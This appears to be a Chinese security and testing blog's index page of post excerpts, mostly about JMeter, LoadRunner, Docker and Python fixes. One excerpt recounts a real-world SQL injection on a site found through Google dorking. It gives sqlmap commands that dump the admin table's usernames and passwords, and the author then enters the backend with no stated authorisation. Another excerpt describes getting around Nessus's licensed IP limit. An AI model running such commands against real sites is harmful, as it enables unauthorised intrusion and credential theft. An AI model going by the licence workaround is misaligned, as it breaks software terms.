Cesii Blog

组合拳：Fiddler+Postman+AppScan，搞定C/S端软件漏洞扫描

cesii 2024-6-14

组合拳：Fiddler+Postman+AppScan，搞定C/S端软件漏洞扫描

时隔3个月，今天来更新一篇个人觉得很有意义的文章，为什么说是这篇内容比较有意义呢？主要有以下几点: 1、关于此问题的文章全网基本上没有，大部分说的都是通过Appscan+Profixer对手机端App测试进行描述，缺少对C/S端的教学； 2、解决了近期项目上的问题； 3、文章+1、也希望能够为以后遇到此问题的朋友们提供一种新的解决方式。废话不多说，开始正事...

1086 0

appscan fiddler

组合拳：Fiddler+Postman+AppScan，搞定C/S端软件漏洞扫描

cesii 2022-9-1

墙烈推荐的快速获取测试脚本方式：Fiddler抓包工具+LoadRunner12

除了LoadRunner自带的代理录制脚本的方式，还有一种更为方便的方式就是通过抓包工具获取测试比较，使用WireShark抓包的方式已经说过了，这次就来换另一款工具：Fiddler 最新版的Fiddler全名叫“Fiddler EveryWhere”，如果没有最新版用老版的也不影响（个人推荐新版，新版增加了更好用的接口调试功能）。除了用到Fiddler这款...

968 0

墙烈推荐的快速获取测试脚本方式：Fiddler抓包工具+LoadRunner12

JS特效-新年（灯笼）

cesii 2025-4-27

JS特效-新年（灯笼）

16 0

js、JavaScript

意想不到的惊喜-某网站身份未授权漏洞

cesii 2025-2-7

意想不到的惊喜-某网站身份未授权漏洞

好久没登录的x网站忘记了用户名，想着找回下结果发现了意向不到的惊喜。正常逻辑下，当用户找回用户名时会将找回地址发送到对应的邮箱中，然后通过邮件中的找回地址重新设置，实际上发现邮箱并没有收到邮件，而是将找回信息直接暴露在网页上，可以直接通过上面的找回地址重置用户名的密码，按照此方式只要知道网站的已知用户邮箱就可以做到重置其他用户的密码了。漏洞已反馈至网站...

278 0

web漏洞

JMeter中使用“Multipart/from-data”和不使用“Multipart/from-data”区别

cesii 2024-12-12

JMeter中使用“Multipart/from-data”和不使用“Multipart/from-data”区别

近期项目实施中遇到了此类问题，在接口调试中有一个选项叫Use Multipart/from-data, 默认情况下这个选项是不勾选的，请求后发现数据返回不对此时request请求数据如下：勾选Use Multipart/from-data后,发现数据返回正常了此时request请求数据如下：发现第一次未勾选Use Multipart/from-dat...

440 0

jmeter

Python3报错：from urllib import unquote ImportError: cannot import name 'unquote' from 'urllib' (/usr/lib/python3.11/urllib/__init__.py)

cesii 2024-11-4

Python3报错：from urllib import unquote ImportError: cannot import name 'unquote' from 'urllib' (/usr/lib/python3.11/urllib/init.py)

在 Python 3 中，unquote 函数已被移至 urllib.parse模块。需要将.py文件中的from urllib import unquote改成from urllib.parse import unquote

427 0

python

Python3报错：from StringIO import StringIO ModuleNotFoundError: No module named 'StringIO'

cesii 2024-11-4

Python3报错：from StringIO import StringIO ModuleNotFoundError: No module named 'StringIO'

在 Python 3 中，StringIO 模块已经被移到了 io 模块中。在 Python 2 中，StringIO 是一个独立的模块，如果用的 Python 3版本，编辑.py文件，将文件中的from StringIO import StringIO改为from io import StringIO

371 0

python

Docker快速部署chatgpt

cesii 2024-10-17

Docker快速部署chatgpt

相比百度、Bing或者其他搜索引擎来说，Chatgpt效率会更高，无论是问题还是提供简单的脚本都是gpt更胜一筹，为了方便使用采用docker的方式进行快速部署靶机系统为linux 更新现有的包列表： sudo yum update 安装必要的依赖： sudo yum install -y yum-utils device-mapper-persisten...

766 1

linux chatgpt

进docker容器时报错“OCI runtime exec failed: exec failed: unable to start container process: exec: "bash": executable file not found in $PATH: unknown”

cesii 2024-10-13

进docker容器时报错“OCI runtime exec failed: exec failed: unable to start container process: exec: "bash": executable file not found in $PATH: unknown”

今天在准备进入容器时发现提示了“OCI runtime exec failed: exec failed: unable to start container process: exec: bash: executable file not found in $PATH: unknown” 根据提示能看到缺少bash工具导致的，那就安装下bash工具吧虚机...

462 0

docker

模拟永恒之蓝ms17_010_enternalblue漏洞入侵windows过程

cesii 2024-10-6

模拟永恒之蓝ms17_010_enternalblue漏洞入侵windows过程

环境准备： Metasploit框架、Nmap、Win7靶机（192.168.50.199）、Kali2022攻击终端（192.168.50.27） nmap探测445端口永恒之蓝漏洞是通过windows445端口侵入的，所以这里要探测下win7靶机的445端口是否开放执行 nmap -p 445 ip地址，返回结果显示445端口为开放状态 msf框架永...

446 0

永恒之蓝 nmap kali

模拟永恒之蓝ms17_010_enternalblue漏洞入侵windows过程

Loadrunner 12录制脚本时报错：The recorded script contains no steps

cesii 2024-9-10

Loadrunner 12录制脚本时报错：The recorded script contains no steps

问题描述在使用loadrunner 12录制脚本结束点击停止生成脚本时发现没有发现脚本，而是提示了图示上的错误信息The recorded script contains no steps 问题发生原因原因在于go君每次在录制前都会对Recording Options-Network-Mapping and Filtering中的网络捕获方式（Captu...

1738 0

loadrunner loadrunner错误

Loadrunner 12录制脚本时报错：The recorded script contains no steps

Sql注入漏洞实战记录

cesii 2024-9-3 JavaScript

Sql注入漏洞实战记录

以往在练习sql注入漏洞的时候都是通过搭建靶站的方式进行的，靶站的东西再怎么反复练习也就那么回事了，要是真想有个效果还得来点实际的！闲来无事上google再翻一翻，以前也翻过很多次，无奈技术菜没有找到什么适合我这种菜鸟水平的站来测试一波，真正的大佬都是个站就日的，不像我这种菜鸡，测试个网站还得东翻翻西找找…按照以往的方式还是用goole hacker的方式进行；因为以前找的站结构都是asp.net+win+iis架构的，对这个算是比较熟悉，所以这次用的语法还是这一套，输入hacker语法一顿向后翻页，前几页的不用想了，估计都被玩遍了找了个网站进入后查看产品获取到链接地址：http://www.xxxxx.cn/show.asp?id=14 加个‘符号看看回显信息，发现返回了错误，再试试and 1 = 1 和 1 = 2看下回显，确认是带有sql注入漏洞了因为水平菜，暂时还不能通过sql语句拼接的方式达到最终目的，所以只能用sqlmap工具一波流了… 获取数据库信息 sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --dbs 验证数据库为Microsoft Access 获取数据库表 sqlmap -u http://www.xxxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –tables 获取表属性 sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin --columns 获取表数据 sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin –C username,password –dump 获取系统后台登录地址后台通过gobuster工具获取后登录看下了以往的日志，发现该网站从N年前就一直被别人攻，但是好像网站管理人员并不对此上心（也有可能此网站已经被弃用了），导致现在还有不断的访问日志产生

511 0

sql注入 sqlmap

Minio云存储平台文件上传python脚本示例

cesii 2024-9-1

Minio云存储平台文件上传python脚本示例

最近的项目踩坑，留此记录以备后用。 import boto3 from botocore.exceptions import NoCredentialsError # MinIO服务器的配置信息 minio_endpoint = '地址信息' # 例如 'localhost:9000' access_key = 'access_key信息' secret_key = 'secret_key信息' bucket_name = 'nmsjpt' file_path = 'D:\\minio\\doc11-test.docx' # 本地文件路径 object_name = 'uploadFile/150622001234/ReportForm/1506220012340000001/doc11-test.docx' # 上传到MinIO后的文件名 # 创建一个boto3客户端 s3_client = boto3.client( 's3', endpoint_url=f'http://{minio_endpoint}', aws_access_key_id=access_key, aws_secret_access_key=secret_key ) try: # 上传文件 s3_client.upload_file(file_path, bucket_name, object_name) print(f'文件 {file_path} 成功上传到 {bucket_name}/{object_name}') except FileNotFoundError: print(f'文件 {file_path} 未找到') except NoCredentialsError: print('凭证错误，请检查你的 Access Key 和 Secret Key') except Exception as e: print(f'上传文件时发生错误: {e}')

847 0

python

CentOS快速搭建mqtt服务

cesii 2024-5-1 Burpsuite

CentOS快速搭建mqtt服务

安装Mosquitto： sudo yum install epel-release sudo yum install mosquitto 启动Mosquitto服务 sudo systemctl start mosquitto 设置Mosquitto开机自启动 sudo systemctl enable mosquitto 测试Mosquitto服务先订阅一个mqtt服务 mosquitto_sub -h localhost -t testtopic 发送订阅信息 mosquitto_pub -h localhost -t testtopic -m "hello,mqtt" 然后，就可以看到发送的消息收到了。

539 0

mqtt

解除Nessus扫描ip限制

cesii 2024-3-1

解除Nessus扫描ip限制

暂停nessus服务 systemctl stop nessusd.service 获取nessus插件版本号 https://plugins.nessus.org/v2/plugins.php 创建 plugin_feed_info.inc 文件 PLUGIN_SET = 此处改为获取版本号; PLUGIN_FEED = ProfessionalFeed ...

587 0

nessus

Linux命令之grep日志查询

cesii 2023-9-1 Python

Linux命令之grep日志查询

以前只是用过grep命令查过端口、查过进程信息，但是并不知道可以去查日期过滤日志。上次项目时看到开发人员用到过grep命令，今天在用jmeter测试时又想起了这个命令，于是用一些时间网上查了查用了用，对于日常排错还是非常有帮助的。现在就把关于grep命令常用的一些查询方式写一写，grep命令很强大，是Linux三剑客其中之一，因为自己用的少，暂不具体深挖...

894 0

linux

初上手！Jemter测试TCP协议

cesii 2023-9-1 主机漏洞

初上手！Jemter测试TCP协议

一个对充电桩系统的性能测试前期准备，系统采用TCP协议发送16进制报文的形式进行通信。为了方便后期测试，而且也是因为第一次接触，直接到客户现场调试了下，发现Jmeter是可以支持TCP协议的测试的，去之前也和小伙伴了解了下，百度上还是有很多对应的文章的，但是苦于没有对应的环境，好在客户那边有套测试环境，这样就可以实操下了。根据前期看的文章，整个过程分别为...

484 0

jmeter tcp

Linux运行Jmeter完整过程

cesii 2023-9-1 Web服务

Linux运行Jmeter完整过程

Windows下使用Jmeter比较喜闻乐见了，没啥说的；而且通过这次Linux环境发现跟Windows环境中还是有区别的。在Windows中只需要有java程序就可以正常运行Jmeter了，但是在Linux环境中jdk的变量、jmeter的变量都得加入才可以，具体过程如下：安装jdk 下载jdk之前最好先用uname -m看下硬件的架构情况以免下载错了...

488 0

jmeter linux

组合拳：Fiddler+Postman+AppScan，搞定C/S端软件漏洞扫描

墙烈推荐的快速获取测试脚本方式：Fiddler抓包工具+LoadRunner12

JS特效-新年（灯笼）

意想不到的惊喜-某网站身份未授权漏洞

JMeter中使用“Multipart/from-data”和不使用“Multipart/from-data”区别

Python3报错：from urllib import unquote ImportError: cannot import name 'unquote' from 'urllib' (/usr/lib/python3.11/urllib/init.py)

Python3报错：from StringIO import StringIO ModuleNotFoundError: No module named 'StringIO'

Docker快速部署chatgpt

进docker容器时报错“OCI runtime exec failed: exec failed: unable to start container process: exec: "bash": executable file not found in $PATH: unknown”

模拟永恒之蓝ms17_010_enternalblue漏洞入侵windows过程

Loadrunner 12录制脚本时报错：The recorded script contains no steps

Sql注入漏洞实战记录

Minio云存储平台文件上传python脚本示例

CentOS快速搭建mqtt服务

解除Nessus扫描ip限制

Linux命令之grep日志查询

初上手！Jemter测试TCP协议

Linux运行Jmeter完整过程

热门文章

标签

最新评论